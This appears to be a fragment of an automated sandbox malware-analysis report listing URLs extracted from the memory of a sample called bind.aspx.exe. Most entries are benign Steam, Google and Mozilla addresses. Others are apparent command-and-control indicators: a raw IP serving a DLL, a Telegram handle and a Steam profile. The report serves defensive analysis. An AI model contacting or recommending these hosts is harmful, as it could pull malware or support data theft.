                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0bind.aspx.exe, 00000004.00000002.1880614542.00000000036F8000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, FBFIJJ.4.drfalse
                                		unknown
                                https://duckduckgo.com/chrome_newtabBKKFHI.4.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://player.vimeo.combind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://t.me/iyigunlbind.aspx.exefalse
                                  		unknown
                                  https://duckduckgo.com/ac/?q=BKKFHI.4.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://135.181.31.18/Sbind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://steamcommunity.com/?subsection=broadcastsbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                      		unknown
                                      https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&amp;l=ebind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                        		unknown
                                        https://store.steampowered.com/subscriber_agreement/bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://www.gstatic.cn/recaptcha/bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.valvesoftware.com/legal.htmbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://www.youtube.combind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.google.combind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://s.ytimg.com;bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://stadiatechnologies.comntent-Disposition:bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpfalse
                                                		unknown
                                                https://steam.tv/bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://steamcommunity.com/profiles/76561199761128941/badgesbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                  		unknown
                                                  http://www.mozilla.com/en-US/blocklist/bind.aspx.exe, mozglue.dll.4.drfalse
                                                    		unknown
                                                    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://mozilla.org0/bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGPbind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                      		unknown
                                                      https://135.181.31.18/0n9:6bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://stadiatechnologies.combind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpfalse
                                                          		unknown
                                                          https://store.steampowered.com/pribind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpfalse
                                                            		unknown
                                                            http://store.steampowered.com/privacy_agreement/bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://135.181.31.18/Tn%:2bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://stadiatechnologies.com/(bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://store.steampowered.com/points/shop/bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BKKFHI.4.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://135.181.31.18Tbind.aspx.exe, 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                  		unknown
                                                                  https://sketchfab.combind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://steamcommunity.com/login/home/?goto=profiles%2F7656119976112894176561199761128941[1].htm.4.drfalse
                                                                      		unknown
                                                                      https://www.ecosia.org/newtab/BKKFHI.4.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://lv.queniujq.cnbind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://www.youtube.com/bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199761128941[1].htm.4.drfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://store.steampowered.com/privacy_agreement/bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                          		unknown
                                                                          https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://135.181.31.18/sqlr.dllbind.aspx.exe, 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                            		unknown
                                                                            https://steamcommunity.com/profiles/76561199761128941mbind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://135.181.31.18/hbind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&ambind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://steamcommunity.com/profiles/76561199761128941bbind.aspx.exefalse
                                                                                  		unknown
                                                                                  https://www.google.com/recaptcha/bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://135.181.31.18/;nbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://checkout.steampowered.com/bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishbind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.drfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
